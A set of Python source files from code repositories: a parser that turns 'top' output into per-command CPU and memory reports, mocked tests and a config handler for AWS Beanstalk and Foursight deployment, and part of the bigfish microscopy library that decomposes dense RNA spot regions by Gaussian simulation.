'/usr/bin/containerd-shim-runc-v2', 'goofys', 'nodejs --eval',
'/usr/bin/python3 /usr/local/bin/cwltool', 'containerd-shim',
'/usr/bin/python3 /bin/unattended-upgrade',
'/usr/bin/python3 /usr/local/bin/awsf3',
'/usr/bin/python3 /usr/local/bin/aws s3',
'java -jar /usr/local/bin/cromwell.jar',
'java -jar /usr/local/bin/cromwell-35.jar']
def __init__(self, contents):
"""initialization parsed top output content and
creates processes which is a dictionary with timestamps as keys
and a list of Process class objects as a value.
It also creates empty attributes timestamps, commands, cpus and mems
which can be filled through method :func: digest.
"""
self.processes = dict()
self.timestamps = []
self.commands = []
self.cpus = dict()
self.mems = dict()
self.parse_contents(contents)
def parse_contents(self, contents):
is_in_table = False
for line in contents.splitlines():
if line.startswith('Timestamp:'):
timestamp = line.split()[1]
continue
if line.lstrip().startswith('PID'):
is_in_table = True
continue
if not line or line.isspace():
is_in_table = False
if is_in_table:
if timestamp not in self.processes:
self.processes[timestamp] = []
process = Process(line)
if not self.should_skip_process(process):
self.processes[timestamp].append(Process(line))
def digest(self, max_n_commands=16, sort_by='alphabetical'):
"""Fills in timestamps, commands, cpus and mems attributes
from processes attribute.
:param max_n_commands: When the number of unique commands exceeds
this value, they are collapsed into unique prefixes.
:sort_by: alphabetical|cpu|mem The commands are by default sorted
alphabetically, but optionally can be sorted by total cpus or total
mem (in reverser order) (e.g. the first command consumed the most cpu)
"""
# Reinitializat these so that you get the same results if you run it twice
self.timestamps = []
self.commands = []
self.cpus = dict()
self.mems = dict()
# First fill in commands from commands in processes (and collapse if needed.)
self.commands = self.get_collapsed_commands(max_n_commands)
# Fill in timestamps, cpus and mems from processes, matching collapsed commands.
self.nTimepoints = len(self.processes)
timestamp_ind = 0
for timestamp in sorted(self.processes):
# sorted timestamps (columns)
self.timestamps.append(timestamp)
# commands (rows)
for process in self.processes[timestamp]:
# find a matching collapsed command (i.e. command prefix) and use that as command.
command = Top.convert_command_to_collapsed_command(process.command, self.commands)
if command not in self.cpus:
self.cpus[command] = [0] * self.nTimepoints
self.mems[command] = [0] * self.nTimepoints
self.cpus[command][timestamp_ind] += process.cpu
self.mems[command][timestamp_ind] += process.mem
timestamp_ind += 1
# sort commands according to total cpu
self.sort_commands(by=sort_by)
def get_collapsed_commands(self, max_n_commands):
"""If the number of commands exceeds max_n_commands,
return a collapsed set of commands
that consists of prefixes of commands so that
the total number is within max_n_commands.
First decide the number of words from the beginning of the commands
to collapse commands that start with the same words, i.e.
find the maximum number of words that makes the number of unique commands to be
bounded by max_n_commands.
If using only the first word is not sufficient, go down to the characters of
the first word. If that's still not sufficient, collapse all of them into a single
command ('all_commands')
After the collapse, commands that are unique to a collapsed prefix are
extended back to the original command.
"""
all_commands = set()
for timestamp in self.processes:
all_commands.update(set([pr.command for pr in self.processes[timestamp]]))
if len(all_commands) <= max_n_commands:
# no need to collapse
return list(all_commands)
# decide the number of words from the beginning of the commands
# to collapse commands starting with the same words
all_cmd_lengths = [len(cmd.split()) for cmd in all_commands] # number of words per command
max_cmd_length = max(all_cmd_lengths)
min_cmd_length = min(all_cmd_lengths)
collapsed_len = max_cmd_length - 1
n_commands = len(all_commands)
while(n_commands > max_n_commands and collapsed_len > 1):
reduced_commands = set()
for cmd in all_commands:
reduced_commands.add(Top.first_words(cmd, collapsed_len))
n_commands = len(reduced_commands)
collapsed_len -= 1
# went down to the first words but still too many commands - start splitting characters then
if n_commands > max_n_commands:
all_cmd_lengths = [len(cmd.split()[0]) for cmd in all_commands] # number of characters of the first word
max_cmd_length = max(all_cmd_lengths)
min_cmd_length = min(all_cmd_lengths)
collapsed_len = max_cmd_length - 1
while(n_commands > max_n_commands and collapsed_len > 1):
reduced_commands = set()
for cmd in all_commands:
reduced_commands.add(Top.first_characters(cmd.split()[0], collapsed_len))
n_commands = len(reduced_commands)
collapsed_len -= 1
if n_commands > max_n_commands:
return ['all_commands']
else:
# extend reduced commands that don't need to be reduced
for r_cmd in list(reduced_commands): # wrap in list so that we can remove elements in the loop
uniq_cmds = [cmd for cmd in all_commands if cmd.startswith(r_cmd)]
if len(uniq_cmds) == 1:
reduced_commands.remove(r_cmd)
reduced_commands.add(uniq_cmds[0])
return reduced_commands
def write_to_csv(self, csv_file, metric='cpu', delimiter=',', colname_for_timestamps='timepoints',
timestamp_start=None, timestamp_end=None, base=0):
"""write metrics as csv file with commands as columns
:param metric: 'cpu' or 'mem'
:param delimiter: default ','
:param colname_for_timestamps: colunm name for the timepoint column (1st column). default 'timepoints'
:param timestamp_start: start time in the same timestamp format (e.g. 01:23:45),
time stamps will be converted to minutes since start time.
The report starts with minute 0.
Time points with no top records will be filled with 0.
If not specified, the first timestamp in the top commands will be used.
:param timestamp_end: end time in the same timestamp format (e.g. 01:23:45),
The reports will be generated only up to the end time.
Time points with no top records will be filled with 0.
If not specified, the last timestamp in the top commands will be used.
:param base: default 0. If 0, minutes start with 0, if 1, minutes are 1-based (shifted by 1).
"""
metric_array = getattr(self, metric + 's')
if self.timestamps:
if not timestamp_start:
timestamp_start = self.timestamps[0]
if not timestamp_end:
timestamp_end = self.timestamps[-1]
timestamps_as_minutes = self.timestamps_as_minutes(timestamp_start)
last_minute = self.as_minutes(timestamp_end, timestamp_start)
else: # default when timestamps is not available (empty object)
timestamps_as_minutes = range(0, 5)
last_minute = 5
with open(csv_file, 'w') as fo:
# header
# we have to escape any double quotes that are present in the cmd, before wrapping it in double quotes. Otherwise we
# will get incorrect column counts when creating the metrics report.
fo.write(delimiter.join([colname_for_timestamps] + [Top.wrap_in_double_quotes(cmd.replace('"', '""')) for cmd in self.commands]))
fo.write('\n')
# contents
# skip timepoints earlier than timestamp_start
for i in range(0, len(timestamps_as_minutes)):
if timestamps_as_minutes[i] >= 0:
break
for clock in range(0, last_minute + 1):
clock_shifted = clock + base
if i < len(timestamps_as_minutes) and timestamps_as_minutes[i] == clock:
fo.write(delimiter.join([str(clock_shifted)] + [str(metric_array[cmd][i]) for cmd in self.commands]))
i += 1
else:
fo.write(delimiter.join([str(clock_shifted)] + ['0' for cmd in self.commands])) # add 0 for timepoints not reported
fo.write('\n')
def should_skip_process(self, process):
"""A predicate function to check if the process should be skipped (excluded).
It returns True if the input process should be skipped.
e.g. the top command itself is excluded, as well as docker, awsf3, cwltool, etc.
the list to be excluded is in self.exclude_list.
It compares either first word or first two or three words only.
Kernel threads (single-word commands wrapped in bracket (e.g. [perl]) are also excluded.
"""
first_word = Top.first_words(process.command, 1)
first_two_words = Top.first_words(process.command, 2)
first_three_words = Top.first_words(process.command, 3)
if first_word in self.exclude_list:
return True
elif first_two_words in self.exclude_list:
return True
elif first_three_words in self.exclude_list:
return True
if first_word.startswith('[') and first_word.endswith(']'):
return True
return False
@staticmethod
def convert_command_to_collapsed_command(cmd, collapsed_commands):
if collapsed_commands == 'all_commands': # collapsed to one command
return 'all_commands'
elif cmd in collapsed_commands: # not collapsed
return cmd
else: # collapsed to prefix
all_prefixes = [_ for _ in collapsed_commands if cmd.startswith(_)]
longest_prefix = sorted(all_prefixes, key=lambda x: len(x), reverse=True)[0]
return longest_prefix
def total_cpu_per_command(self, command):
return sum([v for v in self.cpus[command]])
def total_mem_per_command(self, command):
return sum([v for v in self.mems[command]])
def sort_commands(self, by='cpu'):
"""sort self.commands by total cpu (default) or mem in reverse order,
or alphabetically (by='alphabetical')"""
if by == 'cpu':
self.commands = sorted(self.commands, key=lambda x: self.total_cpu_per_command(x), reverse=True)
elif by == 'mem':
self.commands = sorted(self.commands, key=lambda x: self.total_mem_per_command(x), reverse=True)
elif by == 'alphabetical':
self.commands = sorted(self.commands)
@classmethod
def as_minutes(cls, timestamp, timestamp_start):
"""timestamp as minutes since timestamp_start.
:param timestamp: given timestamp in the same format (e.g. 01:23:45)
:param timestamp_start: start timestamp in the same format (e.g. 01:20:45)
In the above example, 3 will be the return value.
"""
dt = cls.as_datetime(timestamp)
dt_start = cls.as_datetime(timestamp_start)
# negative numbers are not supported by timedelta, so do each case separately
if dt > dt_start:
return round((dt - dt_start).seconds / 60)
else:
return -round((dt_start - dt).seconds / 60)
def timestamps_as_minutes(self, timestamp_start):
"""convert self.timestamps to a list of minutes since timestamp_start
:param timestamp_start: timestamp in the same format (e.g. 01:23:45)
"""
return [self.as_minutes(t, timestamp_start) for t in self.timestamps]
@classmethod
def as_datetime(cls, timestamp):
return datetime.datetime.strptime(timestamp, cls.timestamp_format)
@staticmethod
def wrap_in_double_quotes(string):
"""wrap a given string with double quotes (e.g. haha -> "haha")
"""
return '\"' + string + '\"'
@staticmethod
def first_words(string, n_words):
"""returns first n words of a string
e.g. first_words('abc def ghi', 2) ==> 'abc def'
"""
words = string.split()
return ' '.join(words[0:min(n_words, len(words))])
@staticmethod
def first_characters(string, n_letters):
"""returns first n letters of a string
e.g. first_characters('abc def ghi', 2) ==> 'ab'
"""
letters = list(string)
return ''.join(letters[0:min(n_letters, len(letters))])
def as_dict(self):
return self.__dict__
class Process(object):
def __init__(self, top_line):
prinfo_as_list = top_line.lstrip().split()
self.pid = prinfo_as_list[0]
self.user = prinfo_as_list[1]
self.cpu = float(prinfo_as_list[8])
self.mem = float(prinfo_as_list[9])
self.command = ' '.join(prinfo_as_list[11:])
def as_dict(self):
return self.__dict__
``` |
{
"source": "4dn-dcic/torb",
"score": 2
} |
#### File: tests/create_beanstalk/test_create_bs.py
```python
import pytest
@pytest.fixture
def bs_json():
return {
"source_env": "fourfront-webdev",
"dest_env": "fourfront-staging",
"dry_run": False,
"merge_into": "production",
"repo_owner": "4dn-dcic",
"repo_name": "fourfront",
"branch": "master",
"_overrides": [
{
"waitfor_details": "fourfront-staging.co3gwj7b7tpq.us-east-1.rds.amazonaws.com",
"type": "create_rds",
"id": "fourfront-staging",
"dry_run": False
},
{
"waitfor_details":
"search-fourfront-staging-oqzeugqyyqvgdapb46slrzq5ha.us-east-1.es.amazonaws.com:80",
"type": "create_es",
"id": "fourfront-staging",
"dry_run": False
},
None,
{
"source_env": "fourfront-webdev",
"dest_env": "fourfront-staging",
"dry_run": False,
"merge_into": "production",
"repo_owner": "4dn-dcic",
"repo_name": "fourfront",
"branch": "master"}]}
def test_can_we_get_bs_url(bs_json):
pass
# assert creator(bs_json, 1)
```
#### File: tests/update_foursight/test_update_foursight.py
```python
from ...update_foursight import service
import pytest
import mock
# TODO: This import relates to tests that need to move to dcicutils. See below.
# These comments will go away when the move is accomplished. -kmp 10-Apr-2020
# from dcicutils.beanstalk_utils import create_foursight_auto
@pytest.fixture
def bs_prod_json():
return {
"dest_env": "fourfront-webprod",
"dry_run": False,
}
@pytest.fixture
def bs_json():
return {
"dest_env": "fourfront-mastertest",
"dry_run": False,
}
# TODO: These next two tests (of dcicutils.beanstalk_utils.create_foursight_auto) belong in dcicutils,
# as they don't test any functionality written in this repo. This isn't the right place to be
# distrustful. But, moreover, these tests suppose a particular implementation of that function,
# quite dangerously even, since if that implementation changes, this will execute random pieces
# of operations on production systems. -kmp 10-Apr-2020
#
#
# @mock.patch('dcicutils.beanstalk_utils.get_beanstalk_real_url', return_value='https://data.4dnucleome.org')
# @mock.patch('dcicutils.beanstalk_utils.get_es_from_bs_config', return_value='fake_es_url')
# @mock.patch('dcicutils.beanstalk_utils.create_foursight')
# def test_create_foursight_auto_prod(mock_fs, mock_es, mock_bs, bs_prod_json):
# expected = {
# 'bs_url': 'https://data.4dnucleome.org',
# 'dest_env': 'fourfront-webprod',
# 'es_url': 'fake_es_url',
# 'fs_url': 'data'
# }
#
# create_foursight_auto(bs_prod_json['dest_env'])
# mock_bs.assert_called_once()
# mock_es.assert_called_once_with(expected['dest_env'])
# mock_fs.assert_called_once_with(**expected)
#
#
# @mock.patch('dcicutils.beanstalk_utils.get_beanstalk_real_url', return_value='http://staging.4dnucleome.org')
# @mock.patch('dcicutils.beanstalk_utils.get_es_from_bs_config', return_value='fake_es_url')
# @mock.patch('dcicutils.beanstalk_utils.create_foursight')
# def test_create_foursight_auto_staging_env(mock_fs, mock_es, mock_bs, bs_prod_json):
# expected = {
# 'bs_url': 'http://staging.4dnucleome.org',
# 'dest_env': 'fourfront-webprod',
# 'es_url': 'fake_es_url',
# 'fs_url': 'staging'
# }
#
# create_foursight_auto(bs_prod_json['dest_env'])
# mock_bs.assert_called_once()
# mock_es.assert_called_once_with(expected['dest_env'])
# mock_fs.assert_called_once_with(**expected)
@mock.patch('dcicutils.beanstalk_utils.get_beanstalk_real_url',
return_value='fourfront-mastertest.9wzadzju3p.us-east-1.elasticbeanstalk.com')
@mock.patch('dcicutils.beanstalk_utils.get_es_from_bs_config', return_value='fake_es_url')
@mock.patch('dcicutils.beanstalk_utils.create_foursight')
def test_create_foursight_auto_with_dev_env(mock_create_foursight, mock_get_es_from_bs_config,
mock_get_beanstalk_real_url,
bs_json): # fixture
expected = {
'bs_url': 'fourfront-mastertest.9wzadzju3p.us-east-1.elasticbeanstalk.com',
'dest_env': 'fourfront-mastertest',
'es_url': 'fake_es_url',
'fs_url': 'fourfront-mastertest'
}
service.handler(bs_json, 0)
mock_get_beanstalk_real_url.assert_called_once()
mock_get_es_from_bs_config.assert_called_once_with(expected['dest_env'])
mock_create_foursight.assert_called_once_with(**expected)
@mock.patch('torb.update_foursight.service.bs.create_foursight_auto')
def test_update_foursight_calls_auto_staging(mock_create_foursight_auto):
service.handler({'dest_env': 'staging'}, 1)
mock_create_foursight_auto.assert_called_once_with('staging')
```
#### File: torb/update_bs_config/service.py
```python
import logging
from dcicutils import beanstalk_utils as bs
from ..utils import powerup, get_default
logging.basicConfig()
logger = logging.getLogger('logger')
logger.setLevel(logging.INFO)
@powerup('update_bs_config')
def handler(event, context):
"""
Update the configuration template for an existing ElasticBeanstalk env.
Pass in the EB environment name in the event JSON as `dest_env` and the
configuration template at `template`. If no template is specified, will
use "fourfront-base" by default
Updates `waitfor_details` in the event JSON after the update
"""
template = get_default(event, 'update-template', 'fourfront-base')
dest_env = get_default(event, 'dest_env')
dry_run = get_default(event, 'dry_run')
if not dry_run:
# update environment, keeping current EB env variables
res = bs.update_bs_config(dest_env, template, True)
logger.info(res)
event['waitfor_details'] = 'http://' + res['CNAME']
event['type'] = 'create_bs'
return event
``` |
{
"source": "4DNucleome/big-fish",
"score": 3
} |
#### File: bigfish/detection/dense_decomposition.py
```python
import warnings
import numpy as np
import bigfish.stack as stack
from .spot_modeling import build_reference_spot, modelize_spot, precompute_erf
from .spot_modeling import gaussian_2d, _initialize_grid_2d
from .spot_modeling import gaussian_3d, _initialize_grid_3d
from skimage.measure import regionprops
from skimage.measure import label
# ### Main function ###
def decompose_dense(image, spots, voxel_size_z=None, voxel_size_yx=100,
psf_z=None, psf_yx=200, alpha=0.5, beta=1, gamma=5):
"""Detect dense and bright regions with potential clustered spots and
simulate a more realistic number of spots in these regions.
#. We estimate image background with a large gaussian filter. We then
remove the background from the original image to denoise it.
#. We build a reference spot by aggregating predetected spots.
#. We fit gaussian parameters on the reference spots.
#. We detect dense regions to decompose.
#. We simulate as many gaussians as possible in the candidate regions.
Parameters
----------
image : np.ndarray
Image with shape (z, y, x) or (y, x).
spots : np.ndarray, np.int64
Coordinate of the spots with shape (nb_spots, 3) or (nb_spots, 2)
for 3-d or 2-d images respectively.
voxel_size_z : int or float or None
Height of a voxel, along the z axis, in nanometer. If None, image is
considered in 2-d.
voxel_size_yx : int or float
Size of a voxel on the yx plan, in nanometer.
psf_z : int or float or None
Theoretical size of the PSF emitted by a spot in the z plan, in
nanometer. If None, image is considered in 2-d.
psf_yx : int or float
Theoretical size of the PSF emitted by a spot in the yx plan, in
nanometer.
alpha : int or float
Intensity percentile used to compute the reference spot, between 0
and 1. The higher, the brighter are the spots simulated in the dense
regions. Consequently, a high intensity score reduces the number of
spots added. Default is 0.5, meaning the reference spot considered is
the median spot.
beta : int or float
Multiplicative factor for the intensity threshold of a dense region.
Default is 1. Threshold is computed with the formula:
.. math::
\\mbox{threshold} = \\beta * \\mbox{max(median spot)}
With :math:`\\mbox{median spot}` the median value of all detected spot
signals.
gamma : int or float
Multiplicative factor use to compute a gaussian scale:
.. math::
\\mbox{scale} = \\frac{\\gamma * \\mbox{PSF}}{\\mbox{voxel size}}
We perform a large gaussian filter with such scale to estimate image
background and remove it from original image. A large gamma increases
the scale of the gaussian filter and smooth the estimated background.
To decompose very large bright areas, a larger gamma should be set.
If 0, image is not denoised.
Returns
-------
spots : np.ndarray, np.int64
Coordinate of the spots detected, with shape (nb_spots, 3) or
(nb_spots, 2). One coordinate per dimension (zyx or yx coordinates).
dense_regions : np.ndarray, np.int64
Array with shape (nb_regions, 7) or (nb_regions, 6). One coordinate
per dimension for the region centroid (zyx or yx coordinates), the
number of RNAs detected in the region, the area of the region, its
average intensity value and its index.
reference_spot : np.ndarray
Reference spot in 3-d or 2-d.
"""
# check parameters
stack.check_array(image,
ndim=[2, 3],
dtype=[np.uint8, np.uint16, np.float32, np.float64])
stack.check_array(spots, ndim=2, dtype=np.int64)
stack.check_parameter(voxel_size_z=(int, float, type(None)),
voxel_size_yx=(int, float),
psf_z=(int, float, type(None)),
psf_yx=(int, float),
alpha=(int, float),
beta=(int, float),
gamma=(int, float))
if alpha < 0 or alpha > 1:
raise ValueError("'alpha' should be a value between 0 and 1, not {0}"
.format(alpha))
if beta < 0:
raise ValueError("'beta' should be a positive value, not {0}"
.format(beta))
if gamma < 0:
raise ValueError("'gamma' should be a positive value, not {0}"
.format(gamma))
# check number of dimensions
ndim = image.ndim
if ndim == 3 and voxel_size_z is None:
raise ValueError("Provided image has {0} dimensions but "
"'voxel_size_z' parameter is missing.".format(ndim))
if ndim == 3 and psf_z is None:
raise ValueError("Provided image has {0} dimensions but "
"'psf_z' parameter is missing.".format(ndim))
if ndim != spots.shape[1]:
raise ValueError("Provided image has {0} dimensions but spots are "
"detected in {1} dimensions."
.format(ndim, spots.shape[1]))
if ndim == 2:
voxel_size_z, psf_z = None, None
# case where no spot were detected
if spots.size == 0:
dense_regions = np.array([], dtype=np.int64).reshape((0, ndim + 4))
reference_spot = np.zeros((5,) * ndim, dtype=image.dtype)
return spots, dense_regions, reference_spot
# compute expected standard deviation of the spots
sigma = stack.get_sigma(voxel_size_z, voxel_size_yx, psf_z, psf_yx)
large_sigma = tuple([sigma_ * gamma for sigma_ in sigma])
# denoise the image
if gamma > 0:
image_denoised = stack.remove_background_gaussian(
image,
sigma=large_sigma)
else:
image_denoised = image.copy()
# build a reference median spot
reference_spot = build_reference_spot(
image_denoised,
spots,
voxel_size_z, voxel_size_yx, psf_z, psf_yx,
alpha)
# case with an empty frame as reference spot
if reference_spot.sum() == 0:
dense_regions = np.array([], dtype=np.int64).reshape((0, ndim + 4))
return spots, dense_regions, reference_spot
# fit a gaussian function on the reference spot to be able to simulate it
parameters_fitted = modelize_spot(
reference_spot, voxel_size_z, voxel_size_yx, psf_z, psf_yx)
if ndim == 3:
sigma_z, sigma_yx, amplitude, background = parameters_fitted
else:
sigma_z = None
sigma_yx, amplitude, background = parameters_fitted
# use connected components to detect dense and bright regions
regions_to_decompose, spots_out_regions, region_size = get_dense_region(
image_denoised,
spots,
voxel_size_z, voxel_size_yx, psf_z, psf_yx,
beta)
# case where no region where detected
if regions_to_decompose.size == 0:
dense_regions = np.array([], dtype=np.int64).reshape((0, ndim + 4))
return spots, dense_regions, reference_spot
# precompute gaussian function values
max_grid = region_size + 1
precomputed_gaussian = precompute_erf(
voxel_size_z, voxel_size_yx, sigma_z, sigma_yx, max_grid=max_grid)
# simulate gaussian mixtures in the dense regions
spots_in_regions, dense_regions = simulate_gaussian_mixture(
image=image_denoised,
candidate_regions=regions_to_decompose,
voxel_size_z=voxel_size_z,
voxel_size_yx=voxel_size_yx,
sigma_z=sigma_z,
sigma_yx=sigma_yx,
amplitude=amplitude,
background=background,
precomputed_gaussian=precomputed_gaussian)
# normally the number of detected spots should increase
if len(spots_out_regions) + len(spots_in_regions) < len(spots):
warnings.warn("Problem occurs during the decomposition of dense "
"regions. Less spots are detected after the "
"decomposition than before.",
UserWarning)
# merge outside and inside spots
spots = np.concatenate((spots_out_regions, spots_in_regions[:, :ndim]),
axis=0)
return spots, dense_regions, reference_spot
# ### Dense regions ###
def get_dense_region(image, spots, voxel_size_z=None, voxel_size_yx=100,
psf_z=None, psf_yx=200, beta=1):
"""Detect and filter dense and bright regions.
A candidate region has at least 2 connected pixels above a specific
threshold.
Parameters
----------
image : np.ndarray
Image with shape (z, y, x) or (y, x).
spots : np.ndarray, np.int64
Coordinate of the spots with shape (nb_spots, 3) or (nb_spots, 2).
voxel_size_z : int or float or None
Height of a voxel, along the z axis, in nanometer. If None, we
consider a 2-d image.
voxel_size_yx : int or float
Size of a voxel on the yx plan, in nanometer.
psf_z : int or float or None
Theoretical size of the PSF emitted by a spot in the z plan, in
nanometer. If None, we consider a 2-d image.
psf_yx : int or float
Theoretical size of the PSF emitted by a spot in the yx plan, in
nanometer.
beta : int or float
Multiplicative factor for the intensity threshold of a dense region.
Default is 1. Threshold is computed with the formula:
.. math::
\\mbox{threshold} = \\beta * \\mbox{max(median spot)}
With :math:`\\mbox{median spot}` the median value of all detected spot
signals.
Returns
-------
dense_regions : np.ndarray
Array with selected ``skimage.measure._regionprops._RegionProperties``
objects.
spots_out_region : np.ndarray, np.int64
Coordinate of the spots detected out of dense regions, with shape
(nb_spots, 3) or (nb_spots, 2). One coordinate per dimension (zyx or
yx coordinates).
max_size : int
Maximum size of the regions.
"""
# check parameters
stack.check_array(image,
ndim=[2, 3],
dtype=[np.uint8, np.uint16, np.float32, np.float64])
stack.check_array(spots, ndim=2, dtype=np.int64)
stack.check_parameter(voxel_size_z=(int, float, type(None)),
voxel_size_yx=(int, float),
psf_z=(int, float, type(None)),
psf_yx=(int, float),
beta=(int, float))
if beta < 0:
raise ValueError("'beta' should be a positive value, not {0}"
.format(beta))
# check number of dimensions
ndim = image.ndim
if ndim == 3 and voxel_size_z is None:
raise ValueError("Provided image has {0} dimensions but "
"'voxel_size_z' parameter is missing.".format(ndim))
if ndim == 3 and psf_z is None:
raise ValueError("Provided image has {0} dimensions but "
"'psf_z' parameter is missing.".format(ndim))
if ndim != spots.shape[1]:
raise ValueError("Provided image has {0} dimensions but spots are "
"detected in {1} dimensions."
.format(ndim, spots.shape[1]))
if ndim == 2:
voxel_size_z, psf_z = None, None
# estimate median spot value and a threshold to detect dense regions
median_spot = build_reference_spot(
image,
spots,
voxel_size_z, voxel_size_yx, psf_z, psf_yx,
alpha=0.5)
threshold = int(median_spot.max() * beta)
# get connected regions
connected_regions = _get_connected_region(image, threshold)
# filter connected regions
(dense_regions, spots_out_region, max_size) = _filter_connected_region(
image, connected_regions, spots)
return dense_regions, spots_out_region, max_size
def _get_connected_region(image, threshold):
"""Find connected regions above a fixed threshold.
Parameters
----------
image : np.ndarray
Image with shape (z, y, x) or (y, x).
threshold : int or float
A threshold to detect peaks.
Returns
-------
cc : np.ndarray, np.int64
Image labelled with shape (z, y, x) or (y, x).
"""
# compute binary mask of the filtered image
mask = image > threshold
# find connected components
cc = label(mask)
return cc
def _filter_connected_region(image, connected_component, spots):
"""Filter dense and bright regions (defined as connected component
regions).
A candidate region has at least 2 connected pixels above a specific
threshold.
Parameters
----------
image : np.ndarray
Image with shape (z, y, x) or (y, x).
connected_component : np.ndarray, np.int64
Image labelled with shape (z, y, x) or (y, x).
spots : np.ndarray, np.int64
Coordinate of the spots with shape (nb_spots, 3) or (nb_spots, 2).
Returns
-------
regions_filtered : np.ndarray
Array with filtered skimage.measure._regionprops._RegionProperties.
spots_out_region : np.ndarray, np.int64
Coordinate of the spots outside the regions with shape (nb_spots, 3)
or (nb_spots, 2).
max_region_size : int
Maximum size of the regions.
"""
# get properties of the different connected regions
regions = regionprops(connected_component, intensity_image=image)
# get different features of the regions
area = []
bbox = []
for i, region in enumerate(regions):
area.append(region.area)
bbox.append(region.bbox)
regions = np.array(regions)
area = np.array(area)
bbox = np.array(bbox)
# keep regions with a minimum size
big_area = area >= 2
regions_filtered = regions[big_area]
bbox_filtered = bbox[big_area]
# case where no region big enough were detected
if regions.size == 0:
regions_filtered = np.array([])
return regions_filtered, spots, 0
spots_out_region, max_region_size = _filter_spot_out_candidate_regions(
bbox_filtered, spots, nb_dim=image.ndim)
return regions_filtered, spots_out_region, max_region_size
def _filter_spot_out_candidate_regions(candidate_bbox, spots, nb_dim):
"""Filter spots out of the dense regions.
Parameters
----------
candidate_bbox : List[Tuple]
List of Tuples with the bounding box coordinates.
spots : np.ndarray, np.int64
Coordinate of the spots with shape (nb_spots, 3) or (nb_spots, 2).
nb_dim : int
Number of dimensions to consider (2 or 3).
Returns
-------
spots_out_region : np.ndarray, np.int64
Coordinate of the spots outside the regions with shape (nb_spots, 3)
or (nb_spots, 2).
max_region_size : int
Maximum size of the regions.
"""
# initialization
mask_spots_out = np.ones(spots[:, 0].shape, dtype=bool)
max_region_size = 0
# get detected spots outside 3-d regions
if nb_dim == 3:
for box in candidate_bbox:
(min_z, min_y, min_x, max_z, max_y, max_x) = box
# get the size of the biggest region
size_z = max_z - min_z
size_y = max_y - min_y
size_x = max_x - min_x
max_region_size = max(max_region_size, size_z, size_y, size_x)
# get coordinates of spots inside the region
mask_spots_in = spots[:, 0] < max_z
mask_spots_in = (mask_spots_in & (spots[:, 1] < max_y))
mask_spots_in = (mask_spots_in & (spots[:, 2] < max_x))
mask_spots_in = (mask_spots_in & (min_z <= spots[:, 0]))
mask_spots_in = (mask_spots_in & (min_y <= spots[:, 1]))
mask_spots_in = (mask_spots_in & (min_x <= spots[:, 2]))
mask_spots_out = mask_spots_out & (~mask_spots_in)
# get detected spots outside 2-d regions
else:
for box in candidate_bbox:
(min_y, min_x, max_y, max_x) = box
# get the size of the biggest region
size_y = max_y - min_y
size_x = max_x - min_x
max_region_size = max(max_region_size, size_y, size_x)
# get coordinates of spots inside the region
mask_spots_in = spots[:, 0] < max_y
mask_spots_in = (mask_spots_in & (spots[:, 1] < max_x))
mask_spots_in = (mask_spots_in & (min_y <= spots[:, 0]))
mask_spots_in = (mask_spots_in & (min_x <= spots[:, 1]))
mask_spots_out = mask_spots_out & (~mask_spots_in)
# keep apart spots inside a region
spots_out_region = spots.copy()
spots_out_region = spots_out_region[mask_spots_out]
return spots_out_region, int(max_region_size)
# ### Gaussian simulation ###
def simulate_gaussian_mixture(image, candidate_regions, voxel_size_z=None,
voxel_size_yx=100, sigma_z=None, sigma_yx=200,
amplitude=100, background=0,
precomputed_gaussian=None):
"""Simulate as many gaussians as possible in the candidate dense regions in
order to get a more realistic number of spots.
Parameters
----------
image : np.ndarray
Image with shape (z, y, x) or (y, x).
candidate_regions : np.ndarray
Array with filtered skimage.measure._regionprops._RegionProperties.
voxel_size_z : int or float or None
Height of a voxel, along the z axis, in nanometer. If None, we consider
a 2-d image.
voxel_size_yx : int or float
Size of a voxel on the yx plan, in nanometer.
sigma_z : int or float or None
Standard deviation of the gaussian along the z axis, in nanometer. If
None, we consider a 2-d image.
sigma_yx : int or float
Standard deviation of the gaussian along the yx axis, in nanometer.
amplitude : float
Amplitude of the gaussian.
background : float
Background minimum value of the image.
precomputed_gaussian : Tuple[np.ndarray]
Tuple with one tables of precomputed values for the erf, with shape
(nb_value, 2). One table per dimension.
Returns
-------
spots_in_regions : np.ndarray, np.int64
Coordinate of the spots detected inside dense regions, with shape
(nb_spots, 4) or (nb_spots, 3). One coordinate per dimension (zyx
or yx coordinates) plus the index of the region.
regions : np.ndarray, np.int64
Array with shape (nb_regions, 7) or (nb_regions, 6). One coordinate
per dimension for the region centroid (zyx or yx coordinates), the
number of RNAs detected in the region, the area of the region, its
average intensity value and its index.
"""
# check parameters
stack.check_array(image,
ndim=[2, 3],
dtype=[np.uint8, np.uint16, np.float32, np.float64])
stack.check_parameter(candidate_regions=np.ndarray,
voxel_size_z=(int, float, type(None)),
voxel_size_yx=(int, float),
sigma_z=(int, float, type(None)),
sigma_yx=(int, float),
amplitude=float,
background=float)
if background < 0:
raise ValueError("Background value can't be negative: {0}"
.format(background))
# check number of dimensions
ndim = image.ndim
if ndim == 3 and voxel_size_z is None:
raise ValueError("Provided image has {0} dimensions but "
"'voxel_size_z' parameter is missing."
.format(ndim))
if ndim == 3 and sigma_z is None:
raise ValueError("Provided image has {0} dimensions but "
"'sigma_z' parameter is missing.".format(ndim))
if ndim == 2:
voxel_size_z, sigma_z = None, None
# simulate gaussian mixtures in the candidate regions...
spots_in_regions = []
regions = []
# ... for 3-d regions...
if image.ndim == 3:
for i_region, region in enumerate(candidate_regions):
image_region, _, coord_gaussian = _gaussian_mixture_3d(
image,
region,
voxel_size_z,
voxel_size_yx,
sigma_z,
sigma_yx,
amplitude,
background,
precomputed_gaussian)
# get coordinates of spots and regions in the original image
box = region.bbox
(min_z, min_y, min_x, _, _, _) = box
coord = np.array(coord_gaussian, dtype=np.float64)
coord[:, 0] = (coord[:, 0] / voxel_size_z) + min_z
coord[:, 1] = (coord[:, 1] / voxel_size_yx) + min_y
coord[:, 2] = (coord[:, 2] / voxel_size_yx) + min_x
spots_in_region = np.zeros((coord.shape[0], 4), dtype=np.int64)
spots_in_region[:, :3] = coord
spots_in_region[:, 3] = i_region
spots_in_regions.append(spots_in_region)
region_z, region_y, region_x = tuple(coord[0])
nb_rna_region = coord.shape[0]
region_area = region.area
region_intensity = region.mean_intensity
regions.append([region_z, region_y, region_x, nb_rna_region,
region_area, region_intensity, i_region])
# ... or 2-d regions
else:
for i_region, region in enumerate(candidate_regions):
image_region, _, coord_gaussian = _gaussian_mixture_2d(
image,
region,
voxel_size_yx,
sigma_yx,
amplitude,
background,
precomputed_gaussian)
# get coordinates of spots and regions in the original image
box = region.bbox
(min_y, min_x, _, _) = box
